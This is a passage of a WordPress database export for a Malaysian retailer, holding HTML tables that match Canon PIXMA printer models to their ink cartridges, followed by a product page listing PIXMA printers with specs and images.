width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:18:07','2019-09-24 08:18:07','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3306,1,'2019-09-24 16:18:47','2019-09-24 08:18:47','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink 